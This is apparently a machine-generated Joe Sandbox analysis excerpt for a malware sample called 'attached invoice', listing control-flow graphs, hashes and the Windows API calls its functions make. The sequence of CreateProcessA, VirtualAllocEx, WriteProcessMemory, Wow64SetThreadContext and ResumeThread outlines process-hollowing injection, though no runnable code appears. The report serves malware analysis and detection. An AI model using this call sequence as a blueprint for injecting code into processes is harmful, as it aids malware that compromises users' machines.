                                                                                                    control_flow_graph 134 2e4f25c-2e4f301 137 2e4f303-2e4f31a 134->137 138 2e4f34a-2e4f372 134->138 137->138 141 2e4f31c-2e4f321 137->141 142 2e4f374-2e4f388 138->142 143 2e4f3b8-2e4f40e 138->143 144 2e4f344-2e4f347 141->144 145 2e4f323-2e4f32d 141->145 142->143 153 2e4f38a-2e4f38f 142->153 151 2e4f454-2e4f54b CreateProcessA 143->151 152 2e4f410-2e4f424 143->152 144->138 146 2e4f331-2e4f340 145->146 147 2e4f32f 145->147 146->146 150 2e4f342 146->150 147->146 150->144 171 2e4f554-2e4f639 151->171 172 2e4f54d-2e4f553 151->172 152->151 161 2e4f426-2e4f42b 152->161 154 2e4f391-2e4f39b 153->154 155 2e4f3b2-2e4f3b5 153->155 158 2e4f39d 154->158 159 2e4f39f-2e4f3ae 154->159 155->143 158->159 159->159 160 2e4f3b0 159->160 160->155 163 2e4f42d-2e4f437 161->163 164 2e4f44e-2e4f451 161->164 165 2e4f439 163->165 166 2e4f43b-2e4f44a 163->166 164->151 165->166 166->166 168 2e4f44c 166->168 168->164 184 2e4f649-2e4f64d 171->184 185 2e4f63b-2e4f63f 171->185 172->171 187 2e4f65d-2e4f661 184->187 188 2e4f64f-2e4f653 184->188 185->184 186 2e4f641 185->186 186->184 190 2e4f671-2e4f675 187->190 191 2e4f663-2e4f667 187->191 188->187 189 2e4f655 188->189 189->187 193 2e4f677-2e4f6a0 190->193 194 2e4f6ab-2e4f6b6 190->194 191->190 192 2e4f669 191->192 192->190 193->194 198 2e4f6b7 194->198 198->198
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E4F52F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 894657f56df8b0b8f0cd2188f250f3529dec20e4f9eb8f88f469631778dfb498
                                                                                                    • Instruction ID: 69b7acf1586eb05ba9b4a1a065b01e2b7faff2482872456302d515a4d06dc6e2
                                                                                                    • Opcode Fuzzy Hash: 894657f56df8b0b8f0cd2188f250f3529dec20e4f9eb8f88f469631778dfb498
                                                                                                    • Instruction Fuzzy Hash: 91C13771D002298FEF24DFA9D940BEDBBB1BF49304F00A1A9D819B7650DB749A85CF91
                                                                                                    Function 02E4F268 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 199 2e4f268-2e4f301 201 2e4f303-2e4f31a 199->201 202 2e4f34a-2e4f372 199->202 201->202 205 2e4f31c-2e4f321 201->205 206 2e4f374-2e4f388 202->206 207 2e4f3b8-2e4f40e 202->207 208 2e4f344-2e4f347 205->208 209 2e4f323-2e4f32d 205->209 206->207 217 2e4f38a-2e4f38f 206->217 215 2e4f454-2e4f54b CreateProcessA 207->215 216 2e4f410-2e4f424 207->216 208->202 210 2e4f331-2e4f340 209->210 211 2e4f32f 209->211 210->210 214 2e4f342 210->214 211->210 214->208 235 2e4f554-2e4f639 215->235 236 2e4f54d-2e4f553 215->236 216->215 225 2e4f426-2e4f42b 216->225 218 2e4f391-2e4f39b 217->218 219 2e4f3b2-2e4f3b5 217->219 222 2e4f39d 218->222 223 2e4f39f-2e4f3ae 218->223 219->207 222->223 223->223 224 2e4f3b0 223->224 224->219 227 2e4f42d-2e4f437 225->227 228 2e4f44e-2e4f451 225->228 229 2e4f439 227->229 230 2e4f43b-2e4f44a 227->230 228->215 229->230 230->230 232 2e4f44c 230->232 232->228 248 2e4f649-2e4f64d 235->248 249 2e4f63b-2e4f63f 235->249 236->235 251 2e4f65d-2e4f661 248->251 252 2e4f64f-2e4f653 248->252 249->248 250 2e4f641 249->250 250->248 254 2e4f671-2e4f675 251->254 255 2e4f663-2e4f667 251->255 252->251 253 2e4f655 252->253 253->251 257 2e4f677-2e4f6a0 254->257 258 2e4f6ab-2e4f6b6 254->258 255->254 256 2e4f669 255->256 256->254 257->258 262 2e4f6b7 258->262 262->262
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E4F52F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 6c5dcf65a8dce24c5c7c6b0f93bc3a0c7659eb74d8efdc35e294fa3116586fe3
                                                                                                    • Instruction ID: 9b232736387a2d094c40be2eb431b50ed2c162725dd159361d9072fc9ec62587
                                                                                                    • Opcode Fuzzy Hash: 6c5dcf65a8dce24c5c7c6b0f93bc3a0c7659eb74d8efdc35e294fa3116586fe3
                                                                                                    • Instruction Fuzzy Hash: 70C13771D002298FEF24DFA8D944BEDBBB1BF49304F00A1A9D819B7650DB749A85CF91
                                                                                                    Function 02E4EEC8 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 263 2e4eec8-2e4ef3b 265 2e4ef52-2e4efb9 WriteProcessMemory 263->265 266 2e4ef3d-2e4ef4f 263->266 268 2e4efc2-2e4f014 265->268 269 2e4efbb-2e4efc1 265->269 266->265 269->268
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E4EFA3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: fde04e4b6645604910f7d2c8d1b07174d773694efa60b3efa9fd07eb9b6a1a7c
                                                                                                    • Instruction ID: 186d38e3d60b64f1fc5daeb71ddd6691e72bd6158fcde474805f5d5917f4989d
                                                                                                    • Opcode Fuzzy Hash: fde04e4b6645604910f7d2c8d1b07174d773694efa60b3efa9fd07eb9b6a1a7c
                                                                                                    • Instruction Fuzzy Hash: FF419BB4D012599FDF00CFA9D984ADEFBB1BF49314F24902AE818B7250D735AA45CFA4
                                                                                                    Function 02E4EED0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 274 2e4eed0-2e4ef3b 276 2e4ef52-2e4efb9 WriteProcessMemory 274->276 277 2e4ef3d-2e4ef4f 274->277 279 2e4efc2-2e4f014 276->279 280 2e4efbb-2e4efc1 276->280 277->276 280->279
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E4EFA3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: f0981c9d0e448dc7e8902ca721f999e7fe969054519d922b1879474de4f31d01
                                                                                                    • Instruction ID: 852a932c84e5ea26ba6313277431cd5b061a84786d0f4614c9c65a17c7e68318
                                                                                                    • Opcode Fuzzy Hash: f0981c9d0e448dc7e8902ca721f999e7fe969054519d922b1879474de4f31d01
                                                                                                    • Instruction Fuzzy Hash: 794199B4D012589FDF00CFA9D984ADEFBF1BB49314F24902AE818B7240D735AA45CFA4
                                                                                                    Function 02E4F029 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 393 2e4f029-2e4f0f8 ReadProcessMemory 397 2e4f101-2e4f153 393->397 398 2e4f0fa-2e4f100 393->398 398->397
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E4F0E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 093f997720122028199ef93afdf2c79e284dd1623f6c8b5738d66d7d20d2808f
                                                                                                    • Instruction ID: de414ca7db4ab7dbfa4243c8cbafb5f852ba6bc2723d50a3b8275aa2d93f5ff5
                                                                                                    • Opcode Fuzzy Hash: 093f997720122028199ef93afdf2c79e284dd1623f6c8b5738d66d7d20d2808f
                                                                                                    • Instruction Fuzzy Hash: 8E41B8B9D002599FCF00CFAAD980AEEFBB1BF49310F10942AE814B7200D735A945CFA5
                                                                                                    Function 02E4F030 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 403 2e4f030-2e4f0f8 ReadProcessMemory 406 2e4f101-2e4f153 403->406 407 2e4f0fa-2e4f100 403->407 407->406
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E4F0E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: bf9dc2626d3a61741fc4a1a9c462dab8d5e0136811bb74b525b4a3c2baa311a1
                                                                                                    • Instruction ID: ff1e70270dd233d98a7658196c40ddf23be53136d7d4c81ddf376ccb029ce424
                                                                                                    • Opcode Fuzzy Hash: bf9dc2626d3a61741fc4a1a9c462dab8d5e0136811bb74b525b4a3c2baa311a1
                                                                                                    • Instruction Fuzzy Hash: 6F41B8B8D002589FCF00CFAAD980AEEFBB1BF49310F10942AE814B7200D735A945CFA5
                                                                                                    Function 02E4EDA0 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 412 2e4eda0-2e4ee1e 415 2e4ee25-2e4ee68 VirtualAllocEx 412->415 416 2e4ee71-2e4eebb 415->416 417 2e4ee6a-2e4ee70 415->417 417->416
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E4EE52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 43634eba5dd5c9d43535219298228ceed14823f259fef835e9b14b8516d5da7f
                                                                                                    • Instruction ID: ade0d207360abf550d6e51ceac8816118be874bf2f364f3e512211514c42f171
                                                                                                    • Opcode Fuzzy Hash: 43634eba5dd5c9d43535219298228ceed14823f259fef835e9b14b8516d5da7f
                                                                                                    • Instruction Fuzzy Hash: D44196B9D002589BDF10CFA9E980ADEFBB5BF49310F14942AE815B7200D735A905CFA5
                                                                                                    Function 02E4EDA8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 422 2e4eda8-2e4ee68 VirtualAllocEx 425 2e4ee71-2e4eebb 422->425 426 2e4ee6a-2e4ee70 422->426 426->425
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E4EE52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 38c689581b1eea1589bf78478e94e803ae50bece5b9358916a794b791f6c09c1
                                                                                                    • Instruction ID: ba6cf0cecfdb96c494630c0efff94cd2904b20276f3d2acc0722433bfd9abda4
                                                                                                    • Opcode Fuzzy Hash: 38c689581b1eea1589bf78478e94e803ae50bece5b9358916a794b791f6c09c1
                                                                                                    • Instruction Fuzzy Hash: 5F4196B9D002599BDF10CFA9E984ADEFBB5BF49310F10A42AE815B7200D735A905CFA5
                                                                                                    Function 02E4EC71 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 431 2e4ec71-2e4ecd8 434 2e4ecef-2e4ecfc 431->434 435 2e4ecda-2e4ecec 431->435 436 2e4ed03-2e4ed3d Wow64SetThreadContext 434->436 435->434 437 2e4ed46-2e4ed92 436->437 438 2e4ed3f-2e4ed45 436->438 438->437
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 02E4ED27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 6086c8160db197ecbfb84bd4fca572686022de3be2f8091ccf71fa78525a93f1
                                                                                                    • Instruction ID: 8004a86164c46d013bc35c26633cdd958d311b9dc5defd07e56b1338e6bffae1
                                                                                                    • Opcode Fuzzy Hash: 6086c8160db197ecbfb84bd4fca572686022de3be2f8091ccf71fa78525a93f1
                                                                                                    • Instruction Fuzzy Hash: 7641CCB5D002589FDB10DFAAD984AEEFBF1BF49314F14802AE418B7240D738A945CF94
                                                                                                    Function 02E4EC78 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 443 2e4ec78-2e4ecd8 445 2e4ecef-2e4ed3d Wow64SetThreadContext 443->445 446 2e4ecda-2e4ecec 443->446 448 2e4ed46-2e4ed92 445->448 449 2e4ed3f-2e4ed45 445->449 446->445 449->448
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 02E4ED27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 33b37aa264c7eb2ecdd096fa370587af1b524a7de026500b07ecce101688c41b
                                                                                                    • Instruction ID: 9e73f3835a2503edca6c824f79a7f8c374f06b25f22a88a77141d9b4b840c396
                                                                                                    • Opcode Fuzzy Hash: 33b37aa264c7eb2ecdd096fa370587af1b524a7de026500b07ecce101688c41b
                                                                                                    • Instruction Fuzzy Hash: 2941CBB4D002589FDB10CFAAD984AEEFBF1BF49314F24802AE418B7240D738A945CF94
                                                                                                    Function 02E4E748 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ResumeThread.KERNELBASE(?), ref: 02E4E7CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 12ee8e04a4cd30877fa3f586ff7f9ed876bdd40c41f4cebc92ca88f351e76f3c
                                                                                                    • Instruction ID: 4fff133a6c2cbdcd4b81aa7ac14698adbb17bc9e32a180bff4297f1c4d799750
                                                                                                    • Opcode Fuzzy Hash: 12ee8e04a4cd30877fa3f586ff7f9ed876bdd40c41f4cebc92ca88f351e76f3c
                                                                                                    • Instruction Fuzzy Hash: 3D31CAB4D012199FDF10CFA9E985AAEFBB5BF48314F14942AE815B7300DB35A901CF94
                                                                                                    Function 02E4E750 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ResumeThread.KERNELBASE(?), ref: 02E4E7CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: c05c44961a8024843e7ca8d87e10302bd4ac8de68a73a87d9ad2f7ef83968766
                                                                                                    • Instruction ID: 03577f4001de399c2b18727a424eef2c82a6db921a457d8c1f76040ce1f52afa
                                                                                                    • Opcode Fuzzy Hash: c05c44961a8024843e7ca8d87e10302bd4ac8de68a73a87d9ad2f7ef83968766
                                                                                                    • Instruction Fuzzy Hash: 9D31B9B4D012199FDF14CFAAE984A9EFBB5BF49314F14942AE815B7300DB35A901CF94
                                                                                                    Function 02DFD01C Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811359834347.0000000002DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DFD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2dfd000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 02208bc9741c4421f87ea28fb5724ce684a512fa4ccac09786eac4775d503b21
                                                                                                    • Instruction ID: df9835e50a0a9915c7fcadeff31eab83caef69f752103a663c4de912c3a44bef
                                                                                                    • Opcode Fuzzy Hash: 02208bc9741c4421f87ea28fb5724ce684a512fa4ccac09786eac4775d503b21
                                                                                                    • Instruction Fuzzy Hash: 82212271204340DFEB54DF24D984B16BB66EB88314F34C669EA4A4B786C73AD806CA61
                                                                                                    Function 02DFD005 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811359834347.0000000002DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DFD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2dfd000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9203461ba1aad8b9564d23aed2a8e1122716c16ed9d8b9c96ab3a3183c441302
                                                                                                    • Instruction ID: 6dd91dd719e28b52153670c2235b7734c4bfb1d72f5bf150a3e27f63c0515054
                                                                                                    • Opcode Fuzzy Hash: 9203461ba1aad8b9564d23aed2a8e1122716c16ed9d8b9c96ab3a3183c441302
                                                                                                    • Instruction Fuzzy Hash: 8D2192755093C08FCB12CF20D590715BF72EB46214F29C5EAD9498F6A7C33AD80ACB62
                                                                                                    Function 02DED731 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811359691858.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2ded000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0631a14b51beeb5a55aa0bc8c40e4700662c95362210adc304b77d2da213953e
                                                                                                    • Instruction ID: aef1808331f7e514503c47f261e1d5902d0a44138e4cdfb5c80d2103d8783067
                                                                                                    • Opcode Fuzzy Hash: 0631a14b51beeb5a55aa0bc8c40e4700662c95362210adc304b77d2da213953e
                                                                                                    • Instruction Fuzzy Hash: 2C01F271008340ABEB10BB29CDC4766FBADEF40264F18851AEC4B0B382D7799C40CAB2
                                                                                                    Function 02DED730 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811359691858.0000000002DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DED000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2ded000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 070d0466e82be7e02712ac08eea14aef8d0ddedee1761c4a5931ad7db05fa295
                                                                                                    • Instruction ID: 7e39bdd4e34d6175d70ee3f9662f5ee8d76a1752bb92db2b4ae768455c53c611
                                                                                                    • Opcode Fuzzy Hash: 070d0466e82be7e02712ac08eea14aef8d0ddedee1761c4a5931ad7db05fa295
                                                                                                    • Instruction Fuzzy Hash: 5EF06275404344AFEB10AB16CC84B62FBADEB81634F28C55AFD594B286C3799C44CAB1

                                                                                                    Non-executed Functions

                                                                                                    Function 02E4BDD0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L#Qy
                                                                                                    • API String ID: 0-1089758637
                                                                                                    • Opcode ID: 594daa96d006d36e9e23e619efa4924669df6f8265a66320c167c0d04c9ec6f5
                                                                                                    • Instruction ID: 2a7fda916caed5f1f4d03f008ea49ca9ad5930c616dd7f9bb3aeb73cff798257
                                                                                                    • Opcode Fuzzy Hash: 594daa96d006d36e9e23e619efa4924669df6f8265a66320c167c0d04c9ec6f5
                                                                                                    • Instruction Fuzzy Hash: 8BE1F674E102598FDB14CFA9D980AADFBB2FB89308F24D169D518A7356CB34A941CF60
                                                                                                    Function 02E4C208 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3fbb098265bf6b98aa7fb3cfed14f97b85eccffb4ba0edbb1d32c9f3d9d1d8e6
                                                                                                    • Instruction ID: 8d99da57a25e8207f6df4339f7b2fc4bd02d93e606de20be05a7dec68e453d1b
                                                                                                    • Opcode Fuzzy Hash: 3fbb098265bf6b98aa7fb3cfed14f97b85eccffb4ba0edbb1d32c9f3d9d1d8e6
                                                                                                    • Instruction Fuzzy Hash: E3E10774E112198FDB14CFA9D580AADFBB2FF88304F24D16AD418A7356DB34A941CF60
                                                                                                    Function 02E4C640 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6aea3f688aa49605fa4a6ba7124742d961b59dde42e175d101bb95f82c2fe65f
                                                                                                    • Instruction ID: 887129b9a5a970211309fd5c7d45d20835b8fc13bd14a2ad2de4ea7400adaea8
                                                                                                    • Opcode Fuzzy Hash: 6aea3f688aa49605fa4a6ba7124742d961b59dde42e175d101bb95f82c2fe65f
                                                                                                    • Instruction Fuzzy Hash: ECE11774E102598FDB14CFA9D580AADBBB2FF88304F24D16AD518AB316DB34AD41CF60
                                                                                                    Function 02E4E840 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5de370ad495c0bfb62d417fd9bcb0895121baeeab8d355bd86ce40c470f8d732
                                                                                                    • Instruction ID: 2ad96aa1b088dd97abbcf3fe9ef9f7c70a2ee5e059baf8bfc55e6b940ea66137
                                                                                                    • Opcode Fuzzy Hash: 5de370ad495c0bfb62d417fd9bcb0895121baeeab8d355bd86ce40c470f8d732
                                                                                                    • Instruction Fuzzy Hash: 93E10574E102598FDB14CFA9D980AADFBB2FF89304F24D169D518AB356CB34A941CF60
                                                                                                    Function 02E4DE40 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.811360475190.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_2e40000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d7586d80a7bff4b2aa4a2450ef16f38569c46c21a77fa3d31894531387441c37
                                                                                                    • Instruction ID: ff44d115bc0c3028d056e8346729c08ad815209a2454ecd9aa9379be6b5eed18
                                                                                                    • Opcode Fuzzy Hash: d7586d80a7bff4b2aa4a2450ef16f38569c46c21a77fa3d31894531387441c37
                                                                                                    • Instruction Fuzzy Hash: 49E10774E102598FDB14CFA9D980AADBBB2FF89304F24D169D818AB355DB34A941CF60

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.4%
                                                                                                    Dynamic/Decrypted Code Coverage:5.6%
                                                                                                    Signature Coverage:8.1%
                                                                                                    Total number of Nodes:160
                                                                                                    Total number of Limit Nodes:14
